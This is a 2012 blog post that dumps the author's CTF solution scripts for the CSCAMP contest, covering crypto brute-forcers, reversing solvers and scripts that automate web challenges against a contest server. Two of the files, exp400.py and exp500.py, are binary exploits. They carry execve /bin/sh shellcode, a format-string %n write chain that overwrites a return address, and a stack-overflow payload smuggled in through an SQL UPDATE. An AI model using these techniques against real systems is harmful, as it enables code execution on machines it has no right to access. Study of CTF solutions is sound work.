CSCAMP CTF - Collection of the Exploits

Monday, November 12, 2012 » cscamp, ctf, spq

CSCAMP CTF Exploits collection

Description

Because im lazy, i just put all the exploits here, the filenames should describe what the exploit is for...

cry300.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
#!/usr/bin/env python2.7

CRC16_XMODEM_TABLE = [
        0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,
        0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,
        0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,
        0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,
        0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,
        0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,
        0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,
        0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,
        0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,
        0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,
        0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,
        0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,
        0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,
        0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,
        0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,
        0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,
        0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,
        0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,
        0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,
        0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,
        0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,
        0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
        0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,
        0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,
        0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,
        0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,
        0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,
        0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,
        0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,
        0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,
        0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,
        0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0,
        ]


def _crc16(data, crc, table):
    """Calculate CRC16 using the given table.
    `data`      - data for calculating CRC, must be a string
    `crc`       - initial value
    `table`     - table for caclulating CRC (list of 256 integers)
    Return calculated value of CRC
    """
    for byte in data:
        crc = ((crc<<8)&0xff00) ^ table[((crc>>8)&0xff)^ord(byte)]
    return crc & 0xffff


def crc16xmodem(data, crc=0):
    """Calculate CRC-CCITT (XModem) variant of CRC16.
    `data`      - data for calculating CRC, must be a string
    `crc`       - initial value
    Return calculated value of CRC
    """
    return _crc16(data, crc, CRC16_XMODEM_TABLE)

possibilites = ['mh1qsmh3Key', 'mh1qsmh3KeQ', 'mh1qsSh3Key', 'mh1qsSh3KeQ', 'mh1qsTh3Key', 'mh1qsTh3KeQ', 'mh1Ismh3Key', 'mh1Ismh3KeQ', 'mh1IsSh3Key', 'mh1IsSh3KeQ', 'mh1IsTh3Key', 'mh1IsTh3KeQ', 'Sh1qsmh3Key', 'Sh1qsmh3KeQ', 'Sh1qsSh3Key', 'Sh1qsSh3KeQ', 'Sh1qsTh3Key', 'Sh1qsTh3KeQ', 'Sh1Ismh3Key', 'Sh1Ismh3KeQ', 'Sh1IsSh3Key', 'Sh1IsSh3KeQ', 'Sh1IsTh3Key', 'Sh1IsTh3KeQ', 'Th1qsmh3Key', 'Th1qsmh3KeQ', 'Th1qsSh3Key', 'Th1qsSh3KeQ', 'Th1qsTh3Key', 'Th1qsTh3KeQ', 'Th1Ismh3Key', 'Th1Ismh3KeQ', 'Th1IsSh3Key', 'Th1IsSh3KeQ', 'Th1IsTh3Key', 'Th1IsTh3KeQ']

for p in possibilites:
    print hex(crc16xmodem(p)), p

import sys
sys.exit(0)

import subprocess

alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

target = [0x7f, 0xe7, 0xff, 0xce, 0, 0x98, 0x15, 0xdd, 0x88, 0xfb, 0x6e]

def get_possible_chars(pre):
    possible_chars = ""
    for c in alphabet:
        r = [ int(p, 16) for p in subprocess.check_output(['./crypt', pre + c])[24:-2].split(' ') ]
        if r[0:len(pre)+1] == target[0:len(pre)+1]:
            possible_chars += c
    return possible_chars

possibilities = [""]
for i in xrange(0, len(target)):
    print i
    print possibilities
    new_possibilites = []
    for p in possibilities:
        for c in get_possible_chars(p):
            new_possibilites.append(p + c)
    possibilities = new_possibilites
print possibilities

cry400.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/env python

def to_num(a,b,c):
    return int(a,2) | (int(b,2) << 2) | (int(c,2) << 4)

t1="1010111110111110010110101111101111100101101001111110"
t2="0010000101101111101100100001011011111011001011000101"
t3="0000000000000000000010101010101010101010111101111111"
t = dict([(to_num(t1[i:i+2], t2[i:i+2], t3[i:i+2]), chr(ord('A')+(i>>1))) for i in xrange(0, len(t1), 2)])

def to_chr(a,b,c):
    return t[to_num(a,b,c)]

msg1="011001011001111010101010011111111110111101101110111010"
msg2="110010110010000010101010100101010011011011011100000101"
msg3="001110100010100010100010001000110010111010100000100011"
print "".join([to_chr(msg1[i:i+2], msg2[i:i+2], msg3[i:i+2]) for i in xrange(0, len(msg1), 2)])

print nums

exp400.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/env python
import sys
import struct

def call(gdb = True):
    binary = "/levels/level300/level300"
    #binary = "./level300_non_nx________"
    args = [binary, shellcode] + [''] * 43 + [fstr] + addresses
    print '" "'.join(args)
    import os
    if gdb:
        gdb = "/usr/bin/gdb"
        os.execve(gdb, [gdb, "--args"] + args, {})
    else:
        os.execve(binary, args, {})
shellcode = ("\x90" * 1024) + "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"
shellcode_len = len(shellcode)
shellcode = "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"
shellcode = ("\x90" * (shellcode_len - len(shellcode))) + shellcode

rsp = 0x7fffffffe2b0 + (8 * 4)
#rsp = 0x7fffffffa000 + (8 * int(sys.argv[1]))

shellcode_addr = rsp + (0x7fffffffe94c - 0x7fffffffe2b0)
retptr_addr = rsp + 8
addr_offset = 128 + 128 + 128 + 24 + 8 - 3

payload = ""
written = 0

write_now = (0x100 + ((shellcode_addr >>  0) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 0) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >>  8) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 1) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >> 16) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 2) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >> 24) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 3) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >> 32) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 4) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >> 40) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 5) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >> 48) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 6) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >> 56) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 7) + "$n"
written = (written + write_now) & 0xff

payload = payload.replace("%0c", "")

#payload = ""
#for i in xrange(addr_offset, addr_offset + 8):
#   payload+="%"+str(i)+"$s "

payload += "x" * (1024 - len(payload))
addresses = (struct.pack("<QQQQQQQQ", retptr_addr, retptr_addr + 1, retptr_addr + 2, retptr_addr + 3, retptr_addr + 4, retptr_addr + 5, retptr_addr + 6, retptr_addr + 7)+'     ').split("\x00")
fstr = payload
call(False)

exp500.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#!/usr/bin/env python
import struct

buffer_addr = 0x7fffffffe450+128
buffer = ""

shellcode = "\xeb\xfe"
shellcode = "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"

#pad buffer
buffer += '\x90' * (256 - len(shellcode))

#add shellcode
buffer += shellcode

#unimportant vars
buffer += 'A' * (8 * 19)

#ret pointer
buffer += struct.pack("Q", buffer_addr)

buffer_hex = ""
for c in buffer:
    buffer_hex += "%02x" % ord(c)
print 'UPDATE questions SET question = unhex(\'' + buffer_hex + '\')'

rev300a.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python
def swap(a,b):
    temp = s[a]
    s[a] = s[b]
    s[b] = temp

lst1=[8,6,7,16,3,11,4,10,14,1,12,17,2,9,13,15,0,5]
#lst1=[15,13,11,0,10,2,9,6,16,14,12,7,8,3,4,5,1,17]
lst2=[6,8,0,3,7,1,5,4,2]
#lst2=[7,5,3,4,8,6,2,1,0]
map1 = dict([(lst1[i],i) for i in xrange(0, len(lst1))])
map2 = dict([(lst2[i],i) for i in xrange(0, len(lst2))])
str1 = "AeLSQOpsSyjqnjZUss"
str2 = "eErEmEsrv"

out1 = ""
out2 = ""
for i in xrange(0,len(str1)):
    out1 += str1[map1[i]]
for i in xrange(0,len(str2)):
    out2 += str2[map2[i]]
print out1, out2

for x in xrange(8,-1,-1):
    for y in xrange(8,-1,-1):
        swap(y,y+x)
print "".join(s)

for x in xrange(4,-1,-1):
    for y in xrange(4,-1,-1):
        swap(y,y+x)
print "".join(s)

rev300b.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#!/usr/bin/env python
locales=[0x0436,0x041c,0x0484,0x045e,0x0401,0x1401,0x3c01,0x0c01,0x0801,0x2c01,0x3401,0x3001,0x1001,0x1801,0x2001,0x4001,0x2801,0x1c01,0x3801,0x2401,0x042b,0x044d,0x082c,0x042c,0x046d,0x042d,0x0423,0x0445,0x0845,0x141A,0x047e,0x0402,0x0455,0x0403,0x045c,0x0804,0x1004,0x0404,0x0c04,0x1404,0x0483,0x041a,0x101a,0x0405,0x0406,0x048c,0x0465,0x0413,0x0813,0x0466,0x0409,0x0809,0x0c09,0x2809,0x1009,0x2409,0x3c09,0x4009,0x3809,0x1809,0x2009,0x4409,0x1409,0x3409,0x4809,0x1c09,0x2c09,0x3009,0x0425,0x0438,0x0429,0x0464,0x040b,0x040c,0x080c,0x2c0c,0x0c0c,0x240c,0x300c,0x3c0c,0x140c,0x340c,0x180c,0x380c,0xe40c,0x200c,0x280c,0x100c,0x1c0c,0x0462,0x0467,0x042f,0x0456,0x0437,0x0407,0x0c07,0x1407,0x1007,0x0807,0x0408,0x046f,0x0474,0x0447,0x0468,0x0475,0x040d,0x0439,0x040e,0x0469,0x040f,0x0470,0x0421,0x045d,0x083c,0x0410,0x0810,0x0411,0x0486,0x044b,0x0471,0x0860,0x0460,0x043f,0x0453,0x0487,0x0457,0x0412,0x0440,0x0454,0x0476,0x0426,0x0427,0x046e,0x043e,0x083e,0x044c,0x043a,0x0458,0x0481,0x0471,0x044e,0x047c,0x0450,0x0850,0x0461,0x0861,0x0414,0x0814,0x0482,0x0448,0x0472,0x0479,0x0463,0x0415,0x0416,0x0816,0x0446,0x0846,0x046B,0x086B,0x0C6B,0x0417,0x0418,0x0818,0x0419,0x0819,0x043b,0x044f,0x043c,0x046c,0x0c1a,0x081a,0x0459,0x0859,0x045b,0x041b,0x0424,0x0477,0x042e,0x0c0a,0x040a,0x2c0a,0x400a,0x340a,0x240a,0x140a,0x1c0a,0x300a,0x440a,0x100a,0x480a,0x580a,0x080a,0x4c0a,0x180a,0x3c0a,0x280a,0x500a,0x540a,0x380a,0x200a,0x0430,0x0441,0x041d,0x081d,0x045a,0x0428,0x045f,0x085f,0x0449,0x0444,0x044a,0x041e,0x0851,0x0451,0x0873,0x0473,0x0431,0x0432,0x041f,0x0442,0x0480,0x0422,0x0420,0x0820,0x0843,0x0443,0x0433,0x042a,0x0452,0x0488,0x0434,0x0485,0x0478,0x043d,0x046a,0x0435,0x04ff]
random = [41,18467,6334,26500,19169,15724,11478,29358,26962,24464,5705,28145,23281,16827,9961,491,2995,11942,4827,5436,32391,14604,3902,153,292,12382,17421,18716,19718,19895,5447,21726,14771,11538,1869,19912,25667,26299,17035,9894,28703,23811,31322,30333,17673,4664,15141,7711,28253,6868,25547,27644,32662,32757,20037,12859,8723,9741,27529,778,12316,3035,22190,1842,288,30106,9040,8942,19264,22648,27446,23805,15890,6729,24370,15350,15006,31101,24393,3548,19629,12623,24084,19954,18756,11840,4966,7376,13931,26308,16944,32439,24626,11323,5537,21538,16118,2082,22929,16541,4833,31115,4639,29658,22704,9930,13977,2306,31673,22386,5021,28745,26924,19072,6270,5829,26777,15573,5097,16512,23986,13290,9161,18636,22355,24767,23655,15574,4031,12052,27350,1150,16941,21724,13966,3430,31107,30191,18007,11337,15457,12287,27753,10383,14945,8909,32209,9758,24221,18588,6422,24946,27506,13030,16413,29168,900,32591,18762,1655,17410,6359,27624,20537,21548,6483,27595,4041,3602,24350,10291,30836,9374,11020,4596,24021,27348,23199,19668,24484,8281,4734,53,1999,26418,27938,6900,3788,18127,467,3728,14893,24648,22483,17807,2421,14310,6617,22813,9514,14309,7616,18935,17451,20600,5249,16519,31556,22798,30303,6224,11008,5844,32609,14989,32702,3195,20485,3093,14343,30523,1587,29314,9503,7448,25200,13458,6618,20580,19796,14798,15281,19589,20798,28009,27157,20472,23622,18538,12292,6038,24179,18190,29657,7958,6191,19815,22888,19156,11511,16202,2634,24272,20055,20328,22646,26362,4886,18875,28433,29869,20142,23844,1416,21881,31998,10322,18651,10021,5699,3557,28476,27892,24389,5075,10712,2600,2510,21003,26869,17861,14688,13401,9789,15255,16423,5002,10585,24182,10285,27088,31426,28617,23757,9832,30932,4169,2154,25721,17189,19976,31329,2368,28692,21425,10555,3434,16549,7441,9512,30145,18060,21718,3753,16139,12423,16279,25996,16687,12529,22549,17437,19866,12949,193,23195,3297,20416,28286,16105,24488,16282,12455,25734,18114,11701,31316,20671,5786,12263,4313,24355,31185,20053,912,10808,1832,20945,4313,27756,28321,19558,23646,27982,481,4144,23196,20222,7129,2161,5535,20450,11173,10466,12044,21659,26292,26439,17253,20024,26154,29510,4745,20649,13186,8313,4474,28022,2168,14018,18787,9905,17958,7391,10202,3625,26477,4414,9314,25824,29334,25874,24372,20159,11833,28070,7487,28297,7518,8177,17773,32270,1763,2668,17192,13985,3102,8480,29213,7627,4802,4099,30527,2625,1543,1924,11023,29972,13061,14181,31003,27432,17505,27593,22725,13031,8492,142,17222,31286,13064,7900,19187,8360,22413,30974,14270,29170,235,30833,19711,25760,18896,4667,7285,12550,140,13694,2695,21624,28019,2125,26576,21694,22658,26302,17371,22466,4678,22593,23851,25484,1018,28464,21119,23152,2800,18087,31060,1926,9010,4757,32170,20315,9576,30227,12043,22758,7164,5109,7882,17086,29565,3487,29577,14474,2625,25627,5629,31928,25423,28520,6902,14962,123,24596,3737,13261,10195,32525,1264,8260,6202,8116,5030,20326,29011,30771,6411,25547,21153,21520,29790,14924,30188,21763,4940,20851,18662,13829,30900,17713,18958,17578,8365,13007,11477,1200,26058,6439,2303,12760,19357,2324,6477,5108,21113,14887,19801,22850,14460,22428,12993,27384,19405,6540,31111,28704,12835,32356,6072,29350,18823,14485,20556,23216,1626,9357,8526,13357,29337,23271,23869,29361,12896,13022,29617,10112,12717,18696,11585,24041,24423,24129,24229,4565,6559,8932,22296,29855,12053,16962,3584,29734,6654,16972,21457,14369,22532,2963,2607,2483,911,11635,10067,22848,4675,12938,2223,22142,23754,6511,22741,20175,21459,17825,3221,17870,1626,31934,15205,31783,23850,17398,22279,22701,12193,12734,1637,26534,5556,1993,10176,25705,6962,10548,15881,300,14413,16641,19855,24855,13142,11462,27611,30877,20424,32678,1752,18443,28296,12673,10040,9313,875,20072,12818,610,1017,14932,28112,30695,13169,23831,20040,26488,28685,19090,19497,2589,25990,15145,19353,19314,18651,26740,22044,11258,335,8759,11192,7605,25264,12181,28503,3829,23775,20608,29292,5997,17549,29556,25561,31627,6467,29541,26129,31240,27813,29174,20601,6077,20215,8683,8213,23992,25824,5601,23392,15759,2670,26428,28027,4084,10075,18786,15498,24970,6287,23847,32604,503,21221,22663,5706,2363,9010,22171,27489,18240,12164,25542,7619,20913,7591,6704,31818,9232,750,25205,4975,1539,303,11422,21098,11247,13584,13648,2971,17864,22913,11075,21545,28712,17546,18678,1769,15262,8519,13985,28289,15944,2865,18540,23245,25508,28318,27870,9601,28323,21132,24472,27152,25087,28570,29763,29901,17103,14423,3527,11600,26969,14015,5565,28,21543,25347,2088,2943,12637,22409,26463,5049,4681,1588,11342,608,32060,21221,1758,29954,20888,14146,690,7949,12843,21430,25620,748,27067,4536,20783,18035,32226,15185,7038,9853,25629,11224,15748,19923,3359,32257,24766,4944,14955,23318,32726,25411,21025,20355,31001,22549,9496,18584,9515,17964,23342,8075,17913,16142,31196,21948,25072,20426,14606,26173,24429,32404,6705,20626,29812,19375,30093,16565,16036,14736,29141,30814,5994,8256,6652,23936,30838,20482,1355,21015,1131,18230,17841,14625,2011,32637,4186,19690,1650,5662,21634,10893,10353,21416,13452,14008,7262,22233,5454,16303,16634,26303,14256,148,11124,12317,4213,27109,24028,29200,21080,21318,16858,24050,24155,31361,15264,11903,3676,29643,26909,14902,3561,28489,24948,1282,13653,30674,2220,5402,6923,3831,19369,3878,20259,19008,22619,23971,30003,21945,9781,26504,12392,32685,25313,6698,5589,12722,5938,19037,6410,31461,6234,12508,9961,3959,6493,1515,25269,24937,28869,58,14700,13971,26264,15117,16215,24555,7815,18330,3039,30212,29288,28082,1954,16085,20710,24484,24774,8380,29815,25951,6541,18115,1679,17110,25898,23073,788,23977,18132,29956,28689,26113,10008,12941,15790,1723,21363,28,25184,24778,7200,5071,1885,21974,1071,11333,22867,26153,14295,32168,20825,9676,15629,28650,2598,3309,4693,4686,30080,10116,12249,26667,1528,26679,7864,29421,8405,8826,6816,7516,27726,28666,29087,27681,19964,1340,5686,6021,11662,14721,6064,29309,20415,17902,29873]
rand_pos = 0

def rand_reset():
    global rand_pos
    rand_pos = 0

def rand():
    global rand_pos
    r = random[rand_pos]
    rand_pos += 1
    return r


rotations = [8,6,7,16,3,11,4,10,14,1,12,17,2,9,13,15,0,5]
rot_map = dict([(rotations[i],i) for i in xrange(0, len(rotations))])
target = "AeLSQOpsSyjqnjZUss"
target_orig = target
rotated = "".join([target[rot_map[i]] for i in xrange(0,len(target))])
broken = [1,3,4,9,11,12,13,15]
print rotated
def swap(data, a, b):
    if a == b:
        return data
    _min = min(a,b)
    _max = max(a,b)
    return data[0:_min] + data[_max] + data[_min+1:_max] + data[_min] + data[_max+1:]

def set_str(str, pos, new_char):
    return str[0:pos] + new_char + str[pos+1:]

def swap_random(data):
    l = len(data)
    for i in xrange(0, l):
        r = rand() / (0x7fff / (l - i) + 1)
        data = swap(data, i, i+r)
    return data

def swap_weird1(data, x, y, l):
    p = 0
    i = x
    while i >= 0:
        tmp = ord(data[p])
        data = set_str(data, p, data[p+y])
        data = set_str(data, p+y, chr((l >> (tmp&0x1f)) & 0xa0 ^ tmp))
        p += 1
        i -= 1
    return data

def swap_weird2(data, x, y, l):
    p = 0
    i = x
    while i >= 0:
        tmp = ord(data[p])
        data = set_str(data, p, data[p+y])
        data = set_str(data, p+y, chr((l << (tmp&0x1f)) & 0xb8 ^ tmp))
        p += 1
        i -= 1
    return data

input = "synapseLABsOjZSUSq"
l = 0x0c1a
valid_results = [""]
short = []
for p in xrange(0,len(input)):
    print "randomizing", p
    chars = ""
    for c in xrange(0,256):
        rand_reset()
        tmp = set_str(input, p, chr(c))
        tmp = swap_random(tmp)
        tmp2 = swap_random("reverseme")
        tmp = swap_random(tmp)
        tmp2 = swap_random(tmp2)
        for i in xrange(0,5):
            tmp = swap_weird1(tmp, 4, i, l)
        for i in xrange(0,5):
            tmp2 = swap_weird1(tmp2, 4, i, l)
        for i in xrange(0,9):
            tmp = swap_weird2(tmp, 8, i, l)
        if tmp + tmp2 == target_orig + "eErEmEsrv":
            chars += chr(c)
    short.append(chars)
    new_results = []
    for r in valid_results:
        for c in chars:
            new_results.append(r+c)
    valid_results = new_results
print len(valid_results), valid_results
print short

web100.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#!/usr/bin/env python
import urllib2
import urllib
import base64
import re

equation = urllib2.urlopen("http://176.9.193.13/ASmallCalculationChal411A784Y.php")
for l in equation.info().headers:
        if l[0:11] == "Set-Cookie:":
            cookie = l[12:-10]
    elif l[0:2] == "EQ":
        eq = base64.b64decode(l[4:-2])
s = ""
for l in eq.split('\n'):
    if l[0] != ' ':
        continue
    if l[7] == "'":
        s += l[8]
    else:
        s += l[7:-1]

result = eval(s)
print eval(s)

opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', cookie))
rsp = opener.open("http://176.9.193.13/ASmallCalculationChal411A784Y.php", urllib.urlencode({'result' : str(result)}))
print rsp.read()

web300.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/env python
from PIL import Image
import urllib2
from cStringIO import StringIO

im = Image.open("image.jpg")
im.thumbnail((4,3), Image.ANTIALIAS)
correct_positions = [10,6,7,11,5,0,8,1,2,4,9,3]
colors = list(im.getdata())
correct_colors = [colors[p] for p in correct_positions]

img_file = urllib2.urlopen("http://176.9.193.13/CxliTo3-ra/image.php")
for l in img_file.info().headers:
    if l[0:11] != "Set-Cookie:":
        continue
    cookie = l[12:-10]
im = StringIO(img_file.read())
im = Image.open(im)
im.thumbnail((4,3), Image.ANTIALIAS)
colors = list(im.getdata())
best_pixels = []
for r,g,b in correct_colors:
    best_diff = 256 * 3
    i = 0
    for r2,g2,b2 in colors:
        diff = abs(r-r2) + abs(g-g2) + abs(b-b2)
        if diff < best_diff:
            best_diff = diff
            best_px = i
        i += 1
    colors[best_px] = (9999,9999,9999)
    best_pixels.append(str(best_px))
print cookie
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', cookie))
rsp = opener.open("http://176.9.193.13/CxliTo3-ra/s.php?order=" + ":".join(best_pixels))
print rsp.read()